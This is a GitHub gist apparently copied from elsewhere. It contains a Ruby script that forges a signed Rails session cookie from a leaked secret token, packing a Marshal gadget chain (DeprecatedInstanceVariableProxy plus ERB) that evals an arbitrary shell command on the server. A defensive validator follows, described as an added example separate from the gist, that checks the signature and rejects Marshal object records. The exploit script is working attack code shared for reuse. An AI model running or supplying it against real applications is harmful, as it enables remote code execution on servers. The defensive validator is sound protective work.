@arbazkiraak
Forked from rootxharsh/rails-secret-token-rce.rb
Created September 14, 2019 19:35
Rails Secret Token RCE.
# THIS IS COPIED FROM SOMEWHERE. I just saved it in my gists so this can come in handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
  "\x04\x08" +
  "o" +
  ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
  "\x07" +
  ":\x0E@instance" +
  "o" + ":\x08ERB" + "\x06" +
  ":\x09@src" +
  Marshal.dump(code)[2..-1] +
  ":\x0C@method" + ":\x0Bresult"
).chomp
digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"),
                                 SECRET_TOKEN, marshal_payload)
marshal_payload = URI::encode(marshal_payload)
puts "#{marshal_payload}--#{digest}"
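
A defensive counterpart, added here as an example and not part of the gist: a validator for the same `base64--HMAC-SHA1` cookie format that never calls `Marshal.load`. Once the secret has leaked the signature alone proves nothing, so it also walks the Marshal stream and accepts only plain data types, rejecting the object (`o`) records the script above emits. The names `classify_cookie`, `walk`, `read_long`, `read_len` and `UnsafeMarshal` are hypothetical, and the allowlist assumes sessions hold only strings, numbers, arrays and hashes.

```ruby
require 'openssl'
require 'stringio'
class UnsafeMarshal < StandardError; end

# Decode a Marshal integer by hand; nothing here ever calls Marshal.load.
def read_long(io)
  c = io.readbyte
  c -= 256 if c > 127 # the first byte is signed
  return 0 if c.zero?
  return c - 5 if c > 4
  return c + 5 if c < -4
  n = (0...c.abs).sum { |i| io.readbyte << (8 * i) } # little-endian bytes
  c.positive? ? n : n - (1 << (8 * c.abs))
end

def read_len(io)
  read_long(io).tap { |n| raise UnsafeMarshal, 'negative length' if n.negative? }
end

# Walk one value; only plain data types are on the allowlist.
def walk(io, depth = 0)
  raise UnsafeMarshal, 'nesting too deep' if depth > 64
  case (t = io.readbyte.chr)
  when '0', 'T', 'F' then nil                       # nil, true, false
  when 'i', ';', '@' then read_long(io)             # fixnum, symbol link, object link
  when '"', ':', 'f'                                # string, symbol, float
    n = read_len(io)
    raise UnsafeMarshal, 'truncated' if io.read(n).to_s.bytesize < n
  when '[' then read_len(io).times { walk(io, depth + 1) }
  when '{' then (2 * read_len(io)).times { walk(io, depth + 1) }
  when 'I'                                          # value plus ivars (string encoding)
    walk(io, depth + 1)
    (2 * read_len(io)).times { walk(io, depth + 1) }
  else raise UnsafeMarshal, "type #{t.inspect} not on the allowlist"
  end
end

# value is the already URL-decoded cookie, "base64data--hexdigest".
def classify_cookie(value, secret)
  data, digest = value.to_s.split('--', 2)
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data.to_s)
  return :bad_signature unless OpenSSL.secure_compare(expected, digest.to_s)
  io = StringIO.new(data.unpack1('m'))              # base64 decode without the base64 gem
  raise UnsafeMarshal, 'bad header' unless io.read(2) == "\x04\x08".b
  walk(io)
  :ok
rescue UnsafeMarshal, EOFError
  :unsafe_payload
end
```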